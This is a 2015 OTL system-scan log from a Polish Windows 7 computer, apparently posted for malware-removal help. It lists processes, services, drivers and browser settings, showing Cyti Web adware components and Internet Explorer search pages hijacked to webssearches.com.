OTL logfile created on: 2015-01-07 14:48:15 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\BHP\Downloads
Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd

2,86 Gb Total Physical Memory | 1,05 Gb Available Physical Memory | 36,89% Memory free
5,71 Gb Paging File | 3,39 Gb Available in Paging File | 59,31% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 232,88 Gb Total Space | 140,81 Gb Free Space | 60,46% Space Free | Partition Type: NTFS

Computer Name: BHP-KOMPUTER | User Name: BHP | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - File not found --
PRC - [2015-01-07 14:09:16 | 000,529,136 | ---- | M] () -- C:\Program Files\Cyti Web\updateCytiWeb.exe
PRC - [2015-01-07 14:04:33 | 000,529,136 | ---- | M] () -- C:\Program Files\Cyti Web\bin\utilCytiWeb.exe
PRC - [2015-01-07 04:49:56 | 000,098,544 | ---- | M] () -- C:\Program Files\Cyti Web\bin\CytiWeb.BrowserAdapter.exe
PRC - [2015-01-06 22:14:50 | 000,770,944 | ---- | M] (Enigma Software Group USA, LLC.) -- C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
PRC - [2015-01-06 22:09:06 | 001,328,096 | ---- | M] (iWebar) -- C:\Program Files\Ge-Force\4a263a02-ae51-4b9a-a531-2037e520e833-6.exe
PRC - [2015-01-06 19:50:44 | 000,296,176 | ---- | M] () -- C:\Program Files\Cyti Web\bin\CytiWeb.PurBrowse.exe
PRC - [2014-12-19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014-12-10 20:44:36 | 000,337,520 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2014-12-09 19:08:19 | 001,880,752 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_15_0_0_246.exe
PRC - [2014-12-02 20:12:56 | 000,411,920 | ---- | M] (LogMeIn, Inc.) -- C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
PRC - [2014-11-18 21:23:36 | 001,519,808 | ---- | M] (Valve Corporation) -- C:\Program Files\Steam\bin\steamwebhelper.exe
PRC - [2014-11-18 21:23:34 | 001,940,160 | ---- | M] (Valve Corporation) -- C:\Program Files\Steam\Steam.exe
PRC - [2014-11-18 21:23:34 | 000,833,728 | ---- | M] (Valve Corporation) -- C:\Program Files\Common Files\Steam\SteamService.exe
PRC - [2014-08-08 17:57:21 | 003,890,208 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\avastui.exe
PRC - [2014-07-14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014-07-14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2014-07-01 08:25:08 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe
PRC - [2014-06-12 18:05:53 | 000,151,552 | ---- | M] () -- C:\Windows\KMService.exe
PRC - [2014-06-12 18:05:53 | 000,008,192 | ---- | M] () -- C:\Windows\System32\srvany.exe
PRC - [2014-06-12 17:58:31 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2013-12-13 03:47:56 | 000,085,600 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files\Winamp\winampa.exe
PRC - [2013-09-04 18:21:42 | 002,112,000 | ---- | M] () -- C:\Program Files\screenSHU\screenSHU.exe
PRC - [2013-08-02 01:52:57 | 000,271,360 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\conhost.exe
PRC - [2012-11-06 06:42:55 | 000,085,088 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Internet Manager.exe
PRC - [2011-03-14 16:27:28 | 000,271,712 | ---- | M] () -- C:\ProgramData\DataCardService\HWDeviceService.exe
PRC - [2011-02-25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2010-11-20 13:16:54 | 000,100,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\audiodg.exe
PRC - [2010-09-23 15:53:16 | 001,601,536 | ---- | M] () -- C:\Program Files\ASUS\Wireless Console 3\wcourier.exe
PRC - [2009-07-31 08:13:50 | 003,744,616 | ---- | M] (CANON INC.) -- C:\Program Files\Canon\DIAS\CnxDIAS.exe
PRC - [2009-07-14 02:14:24 | 000,157,184 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Windows Defender\MpCmdRun.exe

========== Modules (No Company Name) ==========

MOD - [2015-01-07 04:49:56 | 000,098,544 | ---- | M] () -- C:\Program Files\Cyti Web\bin\CytiWeb.BrowserAdapter.exe
MOD - [2014-12-10 20:44:32 | 003,758,192 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2014-12-09 19:08:19 | 016,841,392 | ---- | M] () -- C:\Windows\System32\Macromed\Flash\NPSWF32_15_0_0_246.dll
MOD - [2014-11-18 21:23:50 | 002,227,904 | ---- | M] () -- C:\Program Files\Steam\video.dll
MOD - [2014-11-18 21:23:34 | 000,690,880 | ---- | M] () -- C:\Program Files\Steam\bin\chromehtml.dll
MOD - [2014-11-11 19:48:12 | 001,171,456 | ---- | M] () -- C:\Program Files\Steam\libavcodec-56.dll
MOD - [2014-11-11 19:48:12 | 000,485,888 | ---- | M] () -- C:\Program Files\Steam\libswscale-3.dll
MOD - [2014-11-11 19:48:12 | 000,442,368 | ---- | M] () -- C:\Program Files\Steam\libavutil-54.dll
MOD - [2014-11-11 19:48:12 | 000,403,968 | ---- | M] () -- C:\Program Files\Steam\libavformat-56.dll
MOD - [2014-11-11 19:48:12 | 000,332,800 | ---- | M] () -- C:\Program Files\Steam\libavresample-2.dll
MOD - [2014-11-11 19:48:04 | 034,589,888 | ---- | M] () -- C:\Program Files\Steam\bin\libcef.dll
MOD - [2014-11-11 19:47:56 | 000,774,656 | ---- | M] () -- C:\Program Files\Steam\SDL2.dll
MOD - [2014-09-06 17:44:46 | 000,035,328 | ---- | M] () -- C:\Program Files\FileZilla FTP Client\fzshellext.dll
MOD - [2014-06-12 17:58:31 | 019,336,120 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\libcef.dll
MOD - [2014-05-24 17:41:24 | 000,892,416 | ---- | M] () -- C:\Program Files\FileZilla FTP Client\libstdc++-6.dll
MOD - [2014-05-24 17:41:24 | 000,091,648 | ---- | M] () -- C:\Program Files\FileZilla FTP Client\libgcc_s_sjlj-1.dll
MOD - [2013-09-04 23:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2013-09-04 18:21:42 | 002,112,000 | ---- | M] () -- C:\Program Files\screenSHU\screenSHU.exe
MOD - [2012-11-06 06:42:55 | 000,085,088 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Internet Manager.exe
MOD - [2012-11-06 05:31:00 | 000,148,992 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\VPNPlugin.dll
MOD - [2012-11-06 05:30:42 | 000,110,080 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\ServiceUIPlugin.dll
MOD - [2012-11-06 05:30:10 | 000,139,776 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\HelpUIPlugin.dll
MOD - [2012-11-06 05:29:07 | 000,423,424 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\USSDUIPlugin.dll
MOD - [2012-11-06 05:24:22 | 000,303,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SettingUIPlugin.dll
MOD - [2012-11-06 05:14:06 | 000,142,336 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\USSDSrvPlugin.dll
MOD - [2012-09-25 02:05:39 | 000,820,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\MiniFramePlugin.dll
MOD - [2012-09-24 12:51:37 | 000,309,128 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\XFramePlugin.dll
MOD - [2012-09-24 12:51:35 | 000,174,984 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\XCodec.dll
MOD - [2012-09-24 12:51:30 | 000,141,704 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Trace.dll
MOD - [2012-09-24 12:51:29 | 000,325,000 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\StatusBarMgrPlugin.dll
MOD - [2012-09-24 12:51:27 | 000,845,704 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SMSUIPlugin.dll
MOD - [2012-09-24 12:51:25 | 000,225,160 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SmsSrvPlugin.dll
MOD - [2012-09-24 12:51:23 | 000,692,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\SmsAppPlugin.dll
MOD - [2012-09-24 12:51:18 | 000,281,992 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\sdk.dll
MOD - [2012-09-24 12:51:16 | 000,396,168 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Proxy.dll
MOD - [2012-09-24 12:51:14 | 000,551,304 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\PluginContainer.dll
MOD - [2012-09-24 12:51:13 | 000,071,560 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSPowerMgr.dll
MOD - [2012-09-24 12:51:11 | 000,137,608 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSNDIS.dll
MOD - [2012-09-24 12:51:09 | 000,139,656 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSDialup.dll
MOD - [2012-09-24 12:51:06 | 000,107,912 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\OSAdapt.dll
MOD - [2012-09-24 12:51:04 | 000,103,304 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NotifyServicePlugin.dll
MOD - [2012-09-24 12:51:02 | 000,242,568 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetSrvPlugin.dll
MOD - [2012-09-24 12:51:01 | 000,506,760 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetSettingPlugin.dll
MOD - [2012-09-24 12:50:59 | 000,523,656 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetInfoUIExPlugin.dll
MOD - [2012-09-24 12:50:57 | 000,301,960 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetInfoSrvPlugin.dll
MOD - [2012-09-24 12:50:55 | 000,314,760 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetInfoRecordUIPlugin.dll
MOD - [2012-09-24 12:50:54 | 000,164,744 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetConnectSrvPlugin.dll
MOD - [2012-09-24 12:50:52 | 000,336,264 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NetConnectPlugin.dll
MOD - [2012-09-24 12:50:50 | 000,185,224 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NDISPlugin.dll
MOD - [2012-09-24 12:50:47 | 000,277,384 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\MenuMgrPlugin.dll
MOD - [2012-09-24 12:50:45 | 000,123,272 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\LayoutPlugin.dll
MOD - [2012-09-24 12:50:41 | 000,424,840 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DialupUIPlugin.dll
MOD - [2012-09-24 12:50:40 | 000,217,992 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DialUpPlugin.dll
MOD - [2012-09-24 12:50:38 | 000,418,184 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DiagnosisPlugin.dll
MOD - [2012-09-24 12:50:36 | 000,306,568 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DeviceSrvPlugin.dll
MOD - [2012-09-24 12:50:34 | 000,565,640 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DeviceMgrUIPlugin.dll
MOD - [2012-09-24 12:50:32 | 000,343,432 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DeviceAppPlugin.dll
MOD - [2012-09-24 12:50:26 | 000,163,208 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\DataServicePlugin.dll
MOD - [2012-09-24 12:50:23 | 000,432,008 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\core.dll
MOD - [2012-09-24 12:50:21 | 000,106,376 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\CompressRatePlugin.dll
MOD - [2012-09-24 12:50:19 | 000,228,232 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Common.dll
MOD - [2012-09-24 12:50:18 | 000,129,928 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\ATR2SMgr.dll
MOD - [2012-09-24 12:50:16 | 000,245,128 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AtCodec.dll
MOD - [2012-09-24 12:50:14 | 000,811,912 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AddrBookUIPlugin.dll
MOD - [2012-09-24 12:50:08 | 000,268,680 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AddrBookSrvPlugin.dll
MOD - [2012-09-24 12:50:06 | 001,093,000 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\AddrBookPlugin.dll
MOD - [2012-05-18 01:40:24 | 000,120,192 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\Win7Support.dll
MOD - [2012-05-18 01:39:11 | 001,107,328 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\NDISAPI.dll
MOD - [2012-05-18 01:38:59 | 000,250,752 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\LiveUpdateInterface.dll
MOD - [2012-01-10 20:12:12 | 000,094,208 | ---- | M] () -- C:\Windows\System32\IccLibDll.dll
MOD - [2011-06-08 08:32:26 | 000,011,362 | ---- | M] () -- C:\Program Files\screenSHU\mingwm10.dll
MOD - [2011-06-08 08:32:24 | 000,043,008 | ---- | M] () -- C:\Program Files\screenSHU\libgcc_s_dw2-1.dll
MOD - [2010-09-23 15:53:16 | 001,601,536 | ---- | M] () -- C:\Program Files\ASUS\Wireless Console 3\wcourier.exe
MOD - [2010-06-04 10:31:46 | 000,082,944 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\plugins\imageformats\qgif4.dll
MOD - [2010-06-04 10:31:46 | 000,081,920 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\plugins\imageformats\qico4.dll
MOD - [2010-05-05 09:47:36 | 002,415,104 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtCore4.dll
MOD - [2010-02-10 15:43:38 | 009,515,520 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtGui4.dll
MOD - [2010-02-10 15:10:26 | 001,148,416 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtNetwork4.dll
MOD - [2010-02-10 15:06:52 | 000,398,336 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\QtXml4.dll
MOD - [2009-06-22 19:42:42 | 000,043,008 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\libgcc_s_dw2-1.dll
MOD - [2009-01-10 11:32:40 | 000,011,362 | ---- | M] () -- C:\Program Files\T-Mobile\InternetManager_H\mingwm10.dll

========== Services (SafeList) ==========

SRV - File not found [On_Demand | Stopped] -- C:\Program Files\Google\Update\GoogleUpdate.exe /medsvc -- (gupdatem)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Google\Update\GoogleUpdate.exe /svc -- (gupdate)
SRV - [2015-01-07 14:09:16 | 000,529,136 | ---- | M] () [Auto | Running] -- C:\Program Files\Cyti Web\updateCytiWeb.exe -- (Update Cyti Web)
SRV - [2015-01-07 14:04:33 | 000,529,136 | ---- | M] () [Auto | Running] -- C:\Program Files\Cyti Web\bin\utilCytiWeb.exe -- (Util Cyti Web)
SRV - [2015-01-06 22:14:50 | 000,770,944 | ---- | M] (Enigma Software Group USA, LLC.) [Auto | Running] -- C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe -- (SpyHunter 4 Service)
SRV - [2015-01-06 22:08:46 | 000,068,608 | ---- | M] (globalUpdate) [On_Demand | Stopped] -- C:\Program Files\globalUpdate\Update\GoogleUpdate.exe -- (globalUpdatem)
SRV - [2015-01-06 22:08:46 | 000,068,608 | ---- | M] (globalUpdate) [Auto | Stopped] -- C:\Program Files\globalUpdate\Update\GoogleUpdate.exe -- (globalUpdate)
SRV - [2014-12-19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014-12-13 17:01:08 | 001,895,760 | ---- | M] (LogMeIn Inc.) [Auto | Stopped] -- C:\Program Files\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2014-12-09 19:09:02 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014-12-02 20:12:56 | 000,411,920 | ---- | M] (LogMeIn, Inc.) [Auto | Running] -- C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe -- (LMIGuardianSvc)
SRV - [2014-11-22 02:55:14 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV - [2014-11-18 21:23:34 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Running] -- C:\Program Files\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014-11-05 14:03:45 | 000,174,112 | ---- | M] (EasyAntiCheat Ltd) [On_Demand | Stopped] -- C:\Windows\System32\EasyAntiCheat.exe -- (EasyAntiCheat)
SRV - [2014-07-24 15:14:44 | 001,343,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\Wat\WatAdminSvc.exe -- (WatAdminSvc)
SRV - [2014-07-14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014-07-14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014-06-12 18:05:53 | 000,008,192 | ---- | M] () [Auto | Running] -- C:\Windows\System32\srvany.exe -- (KMService)
SRV - [2014-06-12 17:58:31 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV - [2014-05-15 15:14:00 | 003,191,392 | ---- | M] (INCA Internet Co., Ltd.) [On_Demand | Stopped] -- C:\Windows\System32\GameMon.des -- (npggsvc)
SRV - [2014-05-01 08:49:58 | 000,022,016 | ---- | M] (Apache Software Foundation) [On_Demand | Stopped] -- c:\wamp\bin\apache\apache2.4.9\bin\httpd.exe -- (wampapache)
SRV - [2014-05-01 08:06:12 | 010,959,360 | ---- | M] () [On_Demand | Stopped] -- c:\wamp\bin\mysql\mysql5.6.17\bin\mysqld.exe -- (wampmysqld)
SRV - [2014-04-03 19:21:48 | 000,315,008 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013-12-18 23:41:02 | 030,814,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2013-10-05 01:38:22 | 000,071,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe -- (VsEtwService120)
SRV - [2013-05-27 05:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2011-06-17 12:04:16 | 000,224,096 | ---- | M] () [Auto | Stopped] -- C:\Program Files\T-Mobile\InternetManager_H\UpdateDog\ouc.exe -- (Internet Manager. RunOuc)
SRV - [2011-03-14 16:27:28 | 000,271,712 | ---- | M] () [Auto | Running] -- C:\ProgramData\DataCardService\HWDeviceService.exe -- (HWDeviceService.exe)
SRV - [2009-07-31 08:13:50 | 003,744,616 | ---- | M] (CANON INC.) [Auto | Running] -- C:\Program Files\Canon\DIAS\CnxDIAS.exe -- (Canon Driver Information Assist Service)
SRV - [2009-07-14 02:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | Disabled | Running] -- C:\Program Files\ShopperPro\JSDriver\1463.0.0.0\jsdrv.sys -- (SPDRIVER_1463.0.0.0)
DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Windows\system32\drivers\EagleXNt.sys -- (EagleXNt)
DRV - [2015-01-06 22:14:56 | 000,019,984 | ---- | M] () [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\EsgScanner.sys -- (EsgScanner)
DRV - [2015-01-06 06:43:12 | 000,043,152 | ---- | M] (StdLib) [Kernel | System | Running] -- C:\Windows\System32\drivers\{f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw.sys -- ({f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw)
DRV - [2014-08-29 09:12:36 | 000,050,728 | ---- | M] (Eugene V. Muzychenko) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\vrtaucbl.sys -- (EuMusDesignVirtualAudioCableWdm)
DRV - [2014-06-12 17:58:56 | 000,777,488 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswsnx.sys -- (aswSnx)
DRV - [2014-06-12 17:58:56 | 000,411,680 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)
DRV - [2014-06-12 17:58:56 | 000,068,312 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\aswstm.sys -- (aswStm)
DRV - [2014-06-12 17:58:33 | 000,180,632 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)
DRV - [2014-06-12 17:58:33 | 000,081,768 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)
DRV - [2014-06-12 17:58:33 | 000,067,824 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV - [2014-06-12 17:58:33 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)
DRV - [2014-06-12 17:58:33 | 000,024,184 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\System32\drivers\aswHwid.sys -- (aswHwid)
DRV - [2014-06-12 17:58:30 | 000,026,136 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswKbd.sys -- (aswKbd)
DRV - [2012-09-18 09:20:45 | 000,203,264 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_juwwanecm.sys -- (huawei_wwanecm)
DRV - [2012-08-20 01:54:19 | 000,027,520 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_juextctrl.sys -- (huawei_ext_ctrl)
DRV - [2012-08-20 01:54:18 | 000,096,000 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_jucdcacm.sys -- (huawei_cdcacm)
DRV - [2012-08-20 01:54:18 | 000,076,544 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ew_jubusenum.sys -- (huawei_enumerator)
DRV - [2011-06-27 00:37:12 | 002,191,872 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\athr.sys -- (athr)
DRV - [2010-11-20 11:24:41 | 000,052,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV - [2010-07-27 02:52:02 | 000,102,784 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_hwusbdev.sys -- (ew_hwusbdev)
DRV - [2010-03-20 05:06:58 | 000,011,136 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ew_usbenumfilter.sys -- (ew_usbenumfilter)
DRV - [2009-09-17 18:54:14 | 000,041,088 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\HECI.sys -- (HECI)
DRV - [2009-07-14 00:52:10 | 000,014,336 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vwifimp.sys -- (vwifimp)
DRV - [2009-03-18 17:35:40 | 000,026,176 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\hamachi.sys -- (hamachi)
DRV - [2007-07-31 01:39:00 | 000,007,680 | ---- | M] (ATK0100) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ATKACPI.sys -- (MTsensor)
DRV - [2006-05-03 21:40:42 | 000,390,784 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\snpstd.sys -- (snpstd)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKCU\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = 
http://istart.webssearches.com/web/?type=ds&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889&q={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" =

========== FireFox ==========

FF - prefs.js..browser.search.isUS: false
FF - prefs.js..browser.search.useDBForOrder: "false"
FF - prefs.js..browser.startup.homepage: "http://www.onet.pl/"
FF - prefs.js..extensions.GLndca3Cymm3Si07.scode: [minified JavaScript]
